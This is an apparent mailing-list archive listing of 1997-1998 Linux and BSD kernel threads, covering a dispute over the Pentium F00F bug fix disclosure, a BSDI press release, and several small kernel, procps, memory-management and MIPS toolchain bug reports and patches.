> References:  <199711142117.NAA27890@.....>
> Sender: owner-linux@cthulhu
> Precedence: bulk
> 
> We also got some good press from it pretty fast after we released the fixes:
> 
> http://www.news.com/News/Item/0,4,16312,00.html
> 
> Whats extremely humorous is that BSDI signed an NDA with Intel to get
> early fix techniques told to them by Intel engineers.  But the NDA
> stated they could not release patch sets for BSDI until Intel said so,
> the thinking on Intel's part is that they wanted nobody to be the
> first with a fix.  BSDI overlooked this and put the fix out, then
> quickly took the fixes down once they released they had breached the
> Intel NDA.
> 
> After the Linux fix was already out, Intel engineers spoke with Linus
> and tried to get him to sign an NDA, I've never laughed so hard in my life.
>
Hmm... The Linux message is not accurate.  At no time has BSDI violated
any agreements with Intel.  The first patch that we put up was a beta
patch.  It solves the problem, but we made some minor improvements on
it in our official patch.

I'll also point out that Intel called us.  From our official patch:

	BSDI has worked closely with Intel since they contacted us about
	this erratum. We were able to develop a workaround for BSD/OS very
	quickly, and Intel's assistance was invaluable in this process.
	BSDI is confident that the software workaround solves this problem
	for our customers.
	...
	Thanks to Intel Corporation for contacting BSDI with data that
	led to the fix.

Also, though I don't personally have anything to support this, it is our
understanding that the Linux fix was based at least in part upon
disassembling our beta patch.

I've attached our "press release".

		-David Borman, dab@bsdi.com


FOR IMMEDIATE RELEASE
Contact:	Donna Faulkner
		Baron, McDonald & Wells
		770/492-0373
		dfaulkner@bmwpr.com

First Intel Pentium Processor 'F0' Bug Fix Announced for BSDI ISP Customers

ISPs and other users of BSD/OS can be protected against system 'freezes'
caused by illegal code strings 

COLORADO SPRINGS, Co.  (November 17, 1997)

Internet Service Providers (ISPs) and other users of the BSD/OS can now protect themselves against problems associated with the 'F0' bug discovered in Intel's Pentium processor.  Berkeley Software Design, Inc. (BSDI) today announced a patch that protects companies running BSD/OS 3.1, 3.0, 2.1 against system freezes caused when the processor receives an illegal, one-line instruction.  
	BSDI's patch enables the BSD/OS to gain control whenever an invalid sequence is executed, enabling the system to take its normal action in response to illegal instructions.  The patch offers a solution to more than 7,000 organizations and companies relying on the BSD/OS, including over 3,000 ISPs worldwide.  ISPs are particularly vulnerable to system attacks based on the Pentium processor bug, since any user or subscriber with malicious intent has the potential to create a system-wide hang-up.

	"BSDI has developed an outstanding reputation for rapid response to attacks," said Mike Karels, vice president of engineering for BSDI.  "Last summer, we were the first commercial vendor to provide a defense against 'SYN-flooding' attacks.  This week, we have once again demonstrated industry-leading support for our customers."

The BSD/OS patch is downloadable from the company's web site at
	http://www.bsdi.com. 
Berkeley Software Design, Inc. is the commercial supplier of the
high-performance BSD Internet and networking system software originally
developed at the University of California, Berkeley.

Internet experts worldwide are powering the networked economy with over 75,000 deployed servers running BSDI software engines and applications.  BSDI products for Intel-based PC platforms include the BSDI Internet Server, BSD/OS, and network software for networking appliance developers.  BSDI customers include Adobe Systems, Chase Manhattan Bank, CompuServe, U.S. West, UUNET Technologies, Volvo, and leading Internet Service Providers worldwide.  BSDI is privately held and headquartered in Colorado Springs, Colorado.  Contact BSDI at 719-593-9445, info@bsdi.com or http://www.bsdi.com.

BSDI, BSD/OS and the BSDI logo are trademarks of Berkeley Software Design, Inc.  All other product or service names are trademarks of their respective owners.

^ permalink raw reply	[relevance 51%]

* Re: Pentium F00F bug Linux workaround; BSDI Response
  1997-11-17 21:28 51%   ` William Fisher
  (?)
@ 1997-11-17 23:23 64%   ` David S. Miller
  1997-11-17 23:56 64%       ` Alan Cox
  -1 siblings, 1 reply; 200+ results
From: David S. Miller @ 1997-11-17 23:23 UTC (permalink / raw)
  To: fisher; +Cc: linux, fisher


I'm going to choose more lightly what I decide to post here if it's
going to make it's way to every tom, dick, and harry out there in the
unix industry...

Fact is that Intel was trying to make sure _no_ vendor had a fix out
before anyone else.  If it was not explicitly stated in the NDA they
signed with Intel, this was a mistake and not what was intended.

Now that you've talked to Borman about this fish, ask him why he had
to take the patch set down within a day or so.  If he says "because it
was a BETA patch set", I'd find his response hard to believe.

Intel engineers internally were working themselves on fixes for
various systems that they did have source to (Linux, maybe
{net,free}BSD and a few others) and planned to release those patch
sets and allow vendors to release their own patches at the same exact
time.

BSDI putting out their patch ahead of that point in time was, if
anything, totally against how Intel wanted things happen.

Later,
David S. Miller
davem@dm.cobaltmicro.com

^ permalink raw reply	[relevance 64%]

* Re: Pentium F00F bug Linux workaround; BSDI Response
@ 1997-11-17 23:56 64%       ` Alan Cox
  0 siblings, 0 replies; 200+ results
From: Alan Cox @ 1997-11-17 23:56 UTC (permalink / raw)
  To: David S. Miller; +Cc: fisher, linux, fisher

> BSDI putting out their patch ahead of that point in time was, if
> anything, totally against how Intel wanted things happen.

Dave talk this off list. And if you are going to say things like
"XYZ violated their NDA" expect them to both hear about it and reply. Fair's
fair.

^ permalink raw reply	[relevance 64%]

* Re: Pentium F00F bug Linux workaround; BSDI Response
@ 1997-11-17 23:56 64%       ` Alan Cox
  0 siblings, 0 replies; 200+ results
From: Alan Cox @ 1997-11-17 23:56 UTC (permalink / raw)
  To: David S. Miller; +Cc: fisher, linux, fisher

> BSDI putting out their patch ahead of that point in time was, if
> anything, totally against how Intel wanted things happen.

Dave talk this off list. And if you are going to say things like
"XYZ violated their NDA" expect them to both hear about it and reply. Fair's
fair.

^ permalink raw reply	[relevance 64%]

* Re: Bug - Re: memleak 'DeLuxe' detector, 2.0.32, patch
       [not found]     <19971205123800.34650@odo.amherst.com>
@ 1997-12-06  6:16 64% ` MOLNAR Ingo
  0 siblings, 0 replies; 200+ results
From: MOLNAR Ingo @ 1997-12-06  6:16 UTC (permalink / raw)
  To: Randy Dees; +Cc: Linux Kernel List


On Fri, 5 Dec 1997, Randy Dees wrote:

> Thanks - but it won't compile for me.  

ok, the problem is that kfree() is now a macro, and the NCR driver tries
to take it's address ... 

this little patch should help:

--- 53c7,8xx.c.orig	Sat Dec  6 08:14:24 1997
+++ 53c7,8xx.c	Sat Dec  6 08:16:20 1997
@@ -3396,6 +3396,11 @@
     NCR53c7x0_write8(STEST3_REG_800, STEST3_800_TE);
 }
 
+static void private_kfree (void * addr)
+{
+	kfree(addr);
+}
+
 /*
  * Function static struct NCR53c7x0_cmd *allocate_cmd (Scsi_Cmnd *cmd)
  * 
@@ -3467,7 +3472,7 @@
 #ifdef LINUX_1_2
 	tmp->free = ((void (*)(void *, int)) kfree_s);
 #else
-	tmp->free = ((void (*)(void *, int)) kfree);
+	tmp->free = ((void (*)(void *, int)) private_kfree);
 #endif
 	save_flags (flags);
 	cli();

^ permalink raw reply	[relevance 64%]

* BIG FAT BUG with free_memory_available()
@ 1998-03-23 19:08 64% Rik van Riel
  0 siblings, 0 replies; 200+ results
From: Rik van Riel @ 1998-03-23 19:08 UTC (permalink / raw)
  To: Linus Torvalds; +Cc: linux-mm

Hi Linus,

it seems like I ran into some big fat bug with
the free_memory_available() test in kswapd.

My system turned into a swap loop with no change
in the amount of free memory and no 128k area free.
Probably this is because there's not one single
128k area without an unswappable page in it.

The only way I see around this is to disallow kernel
memory allocation and locked pages in a certain part
of physical memory, but maybe there's another way...

grtz,

Rik.
+-------------------------------------------+--------------------------+
| Linux: - LinuxHQ MM-patches page          | Scouting       webmaster |
|        - kswapd ask-him & complain-to guy | Vries    cubscout leader |
|     http://www.fys.ruu.nl/~riel/          | <H.H.vanRiel@fys.ruu.nl> |
+-------------------------------------------+--------------------------+

^ permalink raw reply	[relevance 64%]

* free_memory_available() bug in pre-91-1
@ 1998-03-24 23:03 64% H.H.vanRiel
  1998-03-25 23:40 64% ` Linus Torvalds
  0 siblings, 1 reply; 200+ results
From: H.H.vanRiel @ 1998-03-24 23:03 UTC (permalink / raw)
  To: Linus Torvalds; +Cc: linux-mm

Hi Linus,

I've just found a bug in free_memory_available() as
implemented in pre-91-1...
It reacts the same on finding _no_ free item on a list
as it reacts on _multiple_ free items on the list.
So it'll return the same value regardless of whether
there is lots of free memory or there's no free memory...
(notice the 'break;' at two places...)

	do {
		list--;
		/* Empty list? Bad - we need more memory */
		if (list->next == memory_head(list))
			break;
		/* One item on the list? Look further */
		if (list->next->next == memory_head(list))
			continue;
		/* More than one item? We're ok */
		break;
	} while (--nr >= 0);
	spin_unlock_irqrestore(&page_alloc_lock, flags);
	return nr + 1;
}

Rik.
+-------------------------------------------+--------------------------+
| Linux: - LinuxHQ MM-patches page          | Scouting       webmaster |
|        - kswapd ask-him & complain-to guy | Vries    cubscout leader |
|     http://www.fys.ruu.nl/~riel/          | <H.H.vanRiel@fys.ruu.nl> |
+-------------------------------------------+--------------------------+

^ permalink raw reply	[relevance 64%]

* Re: free_memory_available() bug in pre-91-1
  1998-03-24 23:03 64% free_memory_available() bug in pre-91-1 H.H.vanRiel
@ 1998-03-25 23:40 64% ` Linus Torvalds
  1998-03-26  9:08 64%   ` Rik van Riel
  0 siblings, 1 reply; 200+ results
From: Linus Torvalds @ 1998-03-25 23:40 UTC (permalink / raw)
  To: H.H.vanRiel; +Cc: linux-mm



On Wed, 25 Mar 1998, H.H.vanRiel wrote:
> 
> I've just found a bug in free_memory_available() as
> implemented in pre-91-1...

Ugh, yes. How about pre-91-2, which I just put out? It has more of the
code the way I _think_ it should be, and it should try a lot harder to not
hog the CPU with kswapd. 

On a 512MB machine, the "tries" variable easily defaulted to try to page
out 8192 pages at a time, which was what we in the business call "Bad For
Interactive Use" (TM). The new one tries to throw out much fewer pages,
and is happier about being called more often - so kswapd really should be
more of a "background" thing rather than quite easily becoming
foregrounded.

All of this is completely untested in real life, but has gone through the
very strict "Looks Ok To Me" bs-filter. Thus it is obviously perfect and
can have no bugs. As such everybody should immediately upgrade and be
happy forever after. 

		Linus

^ permalink raw reply	[relevance 64%]

* Re: free_memory_available() bug in pre-91-1
  1998-03-25 23:40 64% ` Linus Torvalds
@ 1998-03-26  9:08 64%   ` Rik van Riel
  0 siblings, 0 replies; 200+ results
From: Rik van Riel @ 1998-03-26  9:08 UTC (permalink / raw)
  To: Linus Torvalds; +Cc: linux-mm

On Wed, 25 Mar 1998, Linus Torvalds wrote:

> On Wed, 25 Mar 1998, H.H.vanRiel wrote:
> > 
> > I've just found a bug in free_memory_available() as
> > implemented in pre-91-1...
> 
> Ugh, yes. How about pre-91-2, which I just put out? It has more of the
> code the way I _think_ it should be, and it should try a lot harder to not
> hog the CPU with kswapd. 

Actually, I was referring to the fact that free_memory_available()
returns 3 when there's not a single 128k area available...
In that case, it should return 2.

But I'll try pre-91-2.

Rik.
+-------------------------------------------+--------------------------+
| Linux: - LinuxHQ MM-patches page          | Scouting       webmaster |
|        - kswapd ask-him & complain-to guy | Vries    cubscout leader |
|     http://www.fys.ruu.nl/~riel/          | <H.H.vanRiel@fys.ruu.nl> |
+-------------------------------------------+--------------------------+

^ permalink raw reply	[relevance 64%]

* bug
  @ 1998-04-04 16:30 64% ` Ulf Carlsson
  1998-04-04 15:59 64%   ` bug ralf
  0 siblings, 1 reply; 200+ results
From: Ulf Carlsson @ 1998-04-04 16:30 UTC (permalink / raw)
  To: ralf; +Cc: linux

How's it going with the bug?

- Ulf

^ permalink raw reply	[relevance 64%]

* Re: bug
  1998-04-04 16:30 64% ` bug Ulf Carlsson
@ 1998-04-04 15:59 64%   ` ralf
  0 siblings, 0 replies; 200+ results
From: ralf @ 1998-04-04 15:59 UTC (permalink / raw)
  To: Ulf Carlsson; +Cc: linux

On Sat, Apr 04, 1998 at 06:30:15PM +0200, Ulf Carlsson wrote:

> How's it going with the bug?

EGCS is bootstrapping ...

   Ralf

^ permalink raw reply	[relevance 64%]

* Wrong 'w' and 'ps' (bug in procps?)
@ 1998-05-13 17:10 64% Stephan van Hienen
  1998-05-14  8:22 64% ` David S. Miller
  0 siblings, 1 reply; 200+ results
From: Stephan van Hienen @ 1998-05-13 17:10 UTC (permalink / raw)
  To: ultralinux

hi just installed 1.0.9
and now this 'bug' ?

:

[ddx@sun ddx]$ w
  6:07pm  up 16:51,  4 users,  load average: 0.00, 0.00, 0.00
USER     TTY      FROM              LOGIN@   IDLE   JCPU   PCPU  WHAT
root     tty9                       6:59am 11:06m  0.00s   ?     -
ddx      ttyp0    ddx.ml.org        8:25am  1:56m  0.00s   ?     -
ddx      ttyp1    ddx.ml.org        6:07pm 26.00s  0.00s   ?     -
ddx      ttyp2    ddx.ml.org        6:07pm  0.00s  0.00s   ?     -
[ddx@sun ddx]$ ps
  PID TTY STAT TIME COMMAND
  655  ?  S    0:00 /bin/login -h ddx.ml.org -p
  656  ?  S    0:00 -bash
  667  ?  S    0:05 BitchX
 1127  ?  S    0:00 login -p -h ddx.ml.org -f ddx
 1128  ?  S    0:00 -bash
 1147  ?  S    0:00 login -p -h ddx.ml.org ddx
 1148  ?  S    0:00 -bash
 1157  ?  R    0:00 ps                           

PCPU and the TTY are not logged ok i think

but :

[ddx@sun ddx]$ who
root     tty9     May 13 06:59
ddx      ttyp0    May 13 08:25 (ddx.ml.org)
ddx      ttyp1    May 13 18:07 (ddx.ml.org)
ddx      ttyp2    May 13 18:07 (ddx.ml.org)     

gives it ok

^ permalink raw reply	[relevance 64%]

* Re: Wrong 'w' and 'ps' (bug in procps?)
  1998-05-13 17:10 64% Wrong 'w' and 'ps' (bug in procps?) Stephan van Hienen
@ 1998-05-14  8:22 64% ` David S. Miller
  0 siblings, 0 replies; 200+ results
From: David S. Miller @ 1998-05-14  8:22 UTC (permalink / raw)
  To: ultralinux

   Date: 	Wed, 13 May 1998 19:10:41 +0200 (CEST)
   From: Stephan van Hienen <ddx@cable.a2000.nl>

   hi just installed 1.0.9
   and now this 'bug' ?

Thanks for pointing it out, it is fixed now.  If impatient, unpack the
procps SRPM from the UP-1.0.9 distribution, and perform the following
tasks to get fixed binaries:

1) Add the patch at the end of this mail to your procps tree
2) Rebuild
3) Install
4) Remove /etc/psdevtab
5) Run w, ps, or one of those procps programs once, this will
   rebuild /etc/psdevtab as a side effect

Once done, all the bugs you reported should be gone.

--- proc/devname.c.~1~	Wed May 13 23:26:07 1998
+++ proc/devname.c	Thu May 14 00:11:29 1998
@@ -12,9 +12,9 @@
 #include <unistd.h>
 #include <fcntl.h>
 
-#define __KERNEL__
+/* #define __KERNEL__ */
 #include <linux/kdev_t.h>
-#undef __KERNEL__
+/* #undef __KERNEL__ */
 
 #define DEVDIR		"/dev"
 #define DEVTAB		"psdevtab"
--- w.c.~1~	Fri Feb 13 08:42:38 1998
+++ w.c	Wed May 13 23:46:22 1998
@@ -83,7 +83,7 @@
     if (maxcmd < 3)
 	fprintf(stderr, "warning: screen width %d suboptimal.\n", win.ws_col);
 
-    procs = readproctab(PROC_FILLCMD|PROC_FILLTTY);
+    procs = readproctab(PROC_FILLCMD|PROC_FILLTTY|PROC_FILLUSR);
 
     if (header) {				/* print uptime and headers */
 	print_uptime();

^ permalink raw reply	[relevance 64%]

* Assembler bug
@ 1998-05-27  2:26 64% ralf
  0 siblings, 0 replies; 200+ results
From: ralf @ 1998-05-27  2:26 UTC (permalink / raw)
  To: linux-mips, linux, linux-mips; +Cc: hjl

I ran into an assembler bug which affects at least MIPS GAS 2.7 and 2.8.1.
An example which triggers the bug:

[ralf@lappi ralf]$ cat s.s 
        .globl  label1
label1:

        .org    0x1000

        .align  13		# align on 8kb boundary
[ralf@lappi /tmp]$ mips-linux-as -O3 -o s.o s.s
[ralf@lappi /tmp]$ mips-linux-objdump --syms s.o | grep label1
0000000000002000 g     O .text  0000000000000000 label1
[ralf@lappi /tmp]$ 

=> Label label1 get's the wrong value 0x2000, not 0x0 as it should,
assigned.  Inserting a label definition after the .org pseudo op generates
correct code again.  I haven't tried this on non-MIPS GAS.

  Ralf

^ permalink raw reply	[relevance 64%]

* Bug in do_munmap (fwd)
@ 1998-06-03 17:56 63% Rik van Riel
  1998-06-03 21:01 64% ` Benjamin C.R. LaHaise
  0 siblings, 1 reply; 200+ results
From: Rik van Riel @ 1998-06-03 17:56 UTC (permalink / raw)
  To: Linux MM


---------- Forwarded message ----------
Date: Sun, 31 May 1998 21:40:14 +1700 (PDT)
From: Perry Harrington <pedward@sun4.apsoft.com>
To: Rik Van Riel <H.H.vanRiel@phys.uu.nl>
Subject: Bug in do_munmap

Rik,

 After the PTE bug post to bugtraq last week, I've been investigating
this.  There definitely appears to be a bug, where exactly, I'm unsure.
I've run the PTE killer under 2.1.95 and have confirmed that indeed
768 pages are allocated for the VMA.  munmap is called for each mapping,
however zap_page_range doesn't appear to be freeing all the pages.

 So, to summarize, I have confirmed that 768 pages are not freed, however
the code does call zap_page_range, which should free the PTEs associated
with that mapping.

I think I found the problem.  In zap_page_range:

	pgd_t * dir;
        unsigned long end = address + size;

        dir = pgd_offset(mm, address);
        flush_cache_range(mm, end - size, end);
        while (address < end) {
                zap_pmd_range(dir, address, end - address);
                address = (address + PGDIR_SIZE) & PGDIR_MASK;
                dir++;
        }

As you can see, dir is never freed.  If you look at zap_pmd_range, dir
is used as a lookup point.  dir is what's being left around after the
mmap.  The reason that this isn't a system wide memory leak is because
the pages are freed when the process is reaped. Does this sound right?

--Perry

-- 
Perry Harrington       Linux rules all OSes.    APSoft      ()
email: perry@apsoft.com 			Think Blue. /\

^ permalink raw reply	[relevance 63%]

* Re: Bug in do_munmap (fwd)
  1998-06-03 17:56 63% Bug in do_munmap (fwd) Rik van Riel
@ 1998-06-03 21:01 64% ` Benjamin C.R. LaHaise
  0 siblings, 0 replies; 200+ results
From: Benjamin C.R. LaHaise @ 1998-06-03 21:01 UTC (permalink / raw)
  To: Rik van Riel; +Cc: Perry Harrington, Linux MM

> I think I found the problem.  In zap_page_range:
...
> As you can see, dir is never freed.  If you look at zap_pmd_range, dir
> is used as a lookup point.  dir is what's being left around after the
> mmap.  The reason that this isn't a system wide memory leak is because
> the pages are freed when the process is reaped. Does this sound right?

Even if this particular aspect of it is fixed, the user can still bring
down the system by doing an anon mmap of 1 page at each 4MB boundry...
The correct fix is to have some sort of ulimit on the size of page tables,
or to make page tables swappable (uh-oh, that's a toughie fraught with
races).

		-ben

^ permalink raw reply	[relevance 64%]

* Linux de4x5 driver bug?
@ 1998-06-15 22:44 54% Mark J. Steiglitz
  0 siblings, 0 replies; 200+ results
From: Mark J. Steiglitz @ 1998-06-15 22:44 UTC (permalink / raw)
  To: ultralinux

I am running UltraLinux 1.0.9 with kernel version 2.1.105 on a Sun Ultra 5.
The system contains a Znyx ZX346 4-port 10/100 ethernet card, which is
recognized by the de4x5 driver.

The first port of the card operates properly, but the other three ports either
fail to receive any packets, or exhibit extremely poor performance, with delays
of approximately 2 seconds just to receive a packet from the same ethernet.

Other minor problems which may be related are that "ifconfig -a" shows
incorrect values for various packet counters for any interface corresponding to
any Znyx ZX346 port, and that "netstat -i" reports "unknown interface" for any
interface.

The following messages are displayed on the console when doing a
modprobe de4x5 :

kernel: loading device 'eth1'...
kernel: eth1: DC21140 at 0xfffff9fe02001000 (PCI bus 3, device 4), h/w address 00:c0:95:e0:2e:28,
kernel: eth1: Using generic MII device control. If the board doesn't operate, 
kernel: please mail the following dump to the author:
kernel: 
kernel: MII device address: 1
kernel: MII CR:  3000
kernel: MII SR:  7809
kernel: MII ID0: 15
kernel: MII ID1: f423
kernel: MII ANA: 1e1
kernel: MII ANC: 0
kernel: MII 16:  58
kernel: MII 17:  85e8
kernel: MII 18:  10
kernel: 
kernel:       and requires IRQ608060 (provided by PCI BIOS).
kernel: de4x5.c:V0.536 1998/3/5 davies@maniac.ultranet.com
kernel: loading device 'eth2'...
kernel: eth2: DC21140 at 0xfffff9fe02001080 (PCI bus 3, device 5), h/w address 00:c0:95:e0:2e:29,
kernel: eth2: Using generic MII device control. If the board doesn't operate, 
kernel: please mail the following dump to the author:
kernel: 
kernel: MII device address: 1
kernel: MII CR:  3000
kernel: MII SR:  7809
kernel: MII ID0: 15
kernel: MII ID1: f423
kernel: MII ANA: 1e1
kernel: MII ANC: 0
kernel: MII 16:  58
kernel: MII 17:  85e8
kernel: MII 18:  10
kernel: 
kernel:       and requires IRQ608070 (provided by PCI BIOS).
kernel: de4x5.c:V0.536 1998/3/5 davies@maniac.ultranet.com
kernel: loading device 'eth3'...
kernel: eth3: DC21140 at 0xfffff9fe02001400 (PCI bus 3, device 6), h/w address 00:c0:95:e0:2e:2a,
kernel: eth3: Using generic MII device control. If the board doesn't operate, 
kernel: please mail the following dump to the author:
kernel: 
kernel: MII device address: 1
kernel: MII CR:  3000
kernel: MII SR:  7809
kernel: MII ID0: 15
kernel: MII ID1: f423
kernel: MII ANA: 1e1
kernel: MII ANC: 0
kernel: MII 16:  58
kernel: MII 17:  85e8
kernel: MII 18:  10
kernel: 
kernel:       and requires IRQ608080 (provided by PCI BIOS).
kernel: de4x5.c:V0.536 1998/3/5 davies@maniac.ultranet.com
kernel: loading device 'eth4'...
kernel: eth4: DC21140 at 0xfffff9fe02001480 (PCI bus 3, device 7), h/w address 00:c0:95:e0:2e:2b,
kernel: eth4: Using generic MII device control. If the board doesn't operate, 
kernel: please mail the following dump to the author:
kernel: 
kernel: MII device address: 1
kernel: MII CR:  3000
kernel: MII SR:  7809
kernel: MII ID0: 15
kernel: MII ID1: f423
kernel: MII ANA: 1e1
kernel: MII ANC: 0
kernel: MII 16:  58
kernel: MII 17:  85e8
kernel: MII 18:  10
kernel: 
kernel:       and requires IRQ608090 (provided by PCI BIOS).
kernel: de4x5.c:V0.536 1998/3/5 davies@maniac.ultranet.com

--Mark

^ permalink raw reply	[relevance 54%]

* GCC bug
@ 1998-07-10 19:49 64% ralf
  0 siblings, 0 replies; 200+ results
From: ralf @ 1998-07-10 19:49 UTC (permalink / raw)
  To: Alex deVries; +Cc: linux

Alex,

I fixed a stupid GCC bug.  As a result the package f2c, flex and ncurses-4
will have to be rebuilt using the new GCC or building new programs using
the libraries provided by these packages may not be possible any longer.

I'll send you an updated gcc package asap.

  Ralf

^ permalink raw reply	[relevance 64%]

* Bug
@ 1998-09-04 18:51 64% Ulf Carlsson
  1998-09-04 21:25 64% ` Bug ralf
  0 siblings, 1 reply; 200+ results
From: Ulf Carlsson @ 1998-09-04 18:51 UTC (permalink / raw)
  To: Ralf Baechle; +Cc: linux

Hi,

I think you forgot a break in the middle of a switch statement, setting
order to 3 is pretty nonsense otherwise.
I compiled a new kernel with my patch, and I couldn't see any changes. The
VCED is probably handled correctly by the interrupt anyway.

patch applies to arch/mips/mm/init.c

--- init.c.org  Fri Sep  4 20:34:11 1998
+++ init.c      Fri Sep  4 20:45:40 1998
@@ -126,6 +126,7 @@
        case CPU_R4400SC:
        case CPU_R4400MC:
                order = 3;
+               break;
        default:
                order = 0;
        }

- Ulf

^ permalink raw reply	[relevance 64%]

* Re: Bug
  1998-09-04 18:51 64% Bug Ulf Carlsson
@ 1998-09-04 21:25 64% ` ralf
  0 siblings, 0 replies; 200+ results
From: ralf @ 1998-09-04 21:25 UTC (permalink / raw)
  To: Ulf Carlsson; +Cc: linux

On Fri, Sep 04, 1998 at 08:51:47PM +0200, Ulf Carlsson wrote:

> I think you forgot a break in the middle of a switch statement, setting
> order to 3 is pretty nonsense otherwise.
> I compiled a new kernel with my patch, and I couldn't see any changes. The
> VCED is probably handled correctly by the interrupt anyway.

Thanks, applied.  Note that this bug just resulted in somewhat reduced
performance at cost of 28kb more memory used.  On SC CPUs we use 8
different empty_zero_page pages to avoid VCED errors completly.

  Ralf

^ permalink raw reply	[relevance 64%]

* Haifa scheduler bug in egcs 1.0.2
@ 1998-10-20 23:50 61% ralf
       [not found]     ` <199810210139.SAA22458@dm.cobaltmicro.com>
  0 siblings, 1 reply; 200+ results
From: ralf @ 1998-10-20 23:50 UTC (permalink / raw)
  To: linux, linux-mips, linux-mips

Hi all,

I've resolved a bug report of Ulf Carlson whose kernel compiles resulted
died with:

gcc -D__KERNEL__ -I/home/ulfc/kernels/sgi-lin/linux/include -Wall \
-Wstrict-prototypes -O2 -fomit-frame-pointer -G 0 -mno-abicalls -fno-pic \
-mcpu=r4600 -mips2 -pipe    arch/mips/mm/r6000.c   -o arch/mips/mm/r6000

{standard input}: Assembler messages:
{standard input}:385: Warning: Unmatched %hi reloc
{standard input}:488: Internal error!
Assertion failure in tc_gen_reloc at ./config/tc-mips.c line 10203.
Please report this bug.
make: *** [arch/mips/mm/r6000] Error 1

This is caused by bad assembler code like:

[...]
        lui     $11,%hi(r6000_flush_cache_mm) # high
        lui     $12,%hi(r6000_flush_cache_range) # high
        lui     $17,%hi(r6000_flush_tlb_all) # high
        lui     $2,%hi(r6000_flush_tlb_mm) # high
        lui     $3,%hi(r6000_flush_tlb_range) # high
        lui     $4,%hi(r6000_flush_tlb_page) # high
        lui     $5,%hi(r6000_load_pgd) # high
        lui     $6,%hi(r6000_pgd_init) # high
        lui     $7,%hi(r6000_update_mmu_cache) # high
        lui     $8,%hi(r6000_show_regs) # high
        lui     $9,%hi(r6000_add_wired_entry) # high
        lui     $10,%hi(r6000_user_mode) # high
[...]

Relocating the code generated from this source later on will not be
possible for ld.  As knows this and dies ungracefully.

I was able to track this down to the Haifa scheduler which seems to be
incompatible with the -msplit-addresses used for kernel compiles.  For
now I suggest to recompile egcs without the Haifa scheduler.  Egcs by
default doesn't enable the Haifa scheduler and there is a reason why.

This egcs 1.0.2 bug is a platform independent bug.  Since currently
egcs does not support -msplit-addresses for PIC code, that is all userland
this bug will only hit some low level stuff.

Alex or somebody else, could you make an update to the egcs package
with the haifa scheduler disabled?  Thanks!

  Ralf

^ permalink raw reply	[relevance 61%]

* Re: Haifa scheduler bug in egcs 1.0.2
       [not found]     ` <199810210139.SAA22458@dm.cobaltmicro.com>
@ 1998-10-22  0:44 62%   ` ralf
  0 siblings, 0 replies; 200+ results
From: ralf @ 1998-10-22  0:44 UTC (permalink / raw)
  To: David S. Miller; +Cc: linux, linux-mips, linux-mips

On Tue, Oct 20, 1998 at 06:39:21PM -0700, David S. Miller wrote:

>    Relocating the code generated from this source later on will not be
>    possible for ld.  As knows this and dies ungracefully.
> 
> Then why is this a supposed bug in Haifa?  It looks to me there is a
> problem with how %hi relocs are assosciated with %lo ones in binutils.

It's not necessarily a bug in Haida itself but it gets visible when Haifa
is enabled.  I haven't looked closely at the involved egcs code yet.

> The code you showed me looks perfectly legal.

For ECOFF and ELF, relocations against symbols are done in two parts, with
a hi16 relocation and a lo16 relocation.  Each relocation has only 16 bits of
space to store an addend and a carry may have to be propagated between
the two.  This means that in order for the linker to handle carries
correctly, it must be able to locate both the hi16 and the lo16 relocation.
Object files which don't contain any other information except the order in
the relocation table which could be used to find the hi16 / lo16 relocs which
belong together.

The code I showed cannot be represented in a ELF or ECOFF object such that
the linker still knows which hi16 and which lo16 relocations are associated
with each other.  Therefore it is not possible for the linker to correctly
do the hi16 relocations.  Btw, all MIPS assemblers I know of will warn or
even error about that fragment.

The ABI is quite strict in that aspect, it wants one lo16 per hi16 for the
same symbol.  Binutils relax that by allowing an arbitrary number of hi16
and one lo16 for the same symbol.

  Ralf

^ permalink raw reply	[relevance 62%]

* (fwd) was bug in haifa scheduler (or not)
@ 1998-10-22  6:26 64%   ` Ariel Faigon
  0 siblings, 0 replies; 200+ results
From: Ariel Faigon @ 1998-10-22  6:26 UTC (permalink / raw)
  To: SGI/Linux mailing list

[just forwarding a bounce]

From: "David S. Miller" <davem@dm.cobaltmicro.com>
To: ralf@uni-koblenz.de
CC: linux@cthulhu.engr.sgi.com, linux-mips@fnet.fr,
        linux-mips@vger.rutgers.edu
In-reply-to: <19981022024408.A360@uni-koblenz.de> (ralf@uni-koblenz.de)
Subject: Re: Haifa scheduler bug in egcs 1.0.2
References: <19981021015047.G1830@uni-koblenz.de> <199810210139.SAA22458@dm.cobaltmicro.com> <19981022024408.A360@uni-koblenz.de>

   Date: Thu, 22 Oct 1998 02:44:08 +0200
   From: ralf@uni-koblenz.de

   The ABI is quite strict in that aspect, it wants one lo16 per hi16
   for the same symbol.  Binutils relax that by allowing an arbitrary
   number of hi16 and one lo16 for the same symbol.

I completely understand how hi16/lo16 relocations work on MIPS, but
thanks for reiterating it to me once more.

All you have shown me is a bug in the MIPS ABI, one of thousands.

Therefore, there is no reason binutils cannot handle this sanely, and
be fixed to do so.

Later,
David S. Miller
davem@dm.cobaltmicro.com

----- End of forwarded message from owner-linux@cthulhu -----

-- 
Peace, Ariel

^ permalink raw reply	[relevance 64%]

* (fwd) was bug in haifa scheduler (or not)
@ 1998-10-22  6:26 64%   ` Ariel Faigon
  0 siblings, 0 replies; 200+ results
From: Ariel Faigon @ 1998-10-22  6:26 UTC (permalink / raw)
  To: SGI/Linux mailing list

[just forwarding a bounce]

From: "David S. Miller" <davem@dm.cobaltmicro.com>
To: ralf@uni-koblenz.de
CC: linux@cthulhu.engr.sgi.com, linux-mips@fnet.fr,
        linux-mips@vger.rutgers.edu
In-reply-to: <19981022024408.A360@uni-koblenz.de> (ralf@uni-koblenz.de)
Subject: Re: Haifa scheduler bug in egcs 1.0.2
References: <19981021015047.G1830@uni-koblenz.de> <199810210139.SAA22458@dm.cobaltmicro.com> <19981022024408.A360@uni-koblenz.de>

   Date: Thu, 22 Oct 1998 02:44:08 +0200
   From: ralf@uni-koblenz.de

   The ABI is quite strict in that aspect, it wants one lo16 per hi16
   for the same symbol.  Binutils relax that by allowing an arbitrary
   number of hi16 and one lo16 for the same symbol.

I completely understand how hi16/lo16 relocations work on MIPS, but
thanks for reiterating it to me once more.

All you have shown me is a bug in the MIPS ABI, one of thousands.

Therefore, there is no reason binutils cannot handle this sanely, and
be fixed to do so.

Later,
David S. Miller
davem@dm.cobaltmicro.com

----- End of forwarded message from owner-linux@cthulhu -----

-- 
Peace, Ariel

^ permalink raw reply	[relevance 64%]

* floppy driver bug: write-protect
@ 1998-11-16  1:27 64% Brad Midgley
  1999-01-15  2:18 63% ` David A. Gatwood
                   ` (2 more replies)
  0 siblings, 3 replies; 200+ results
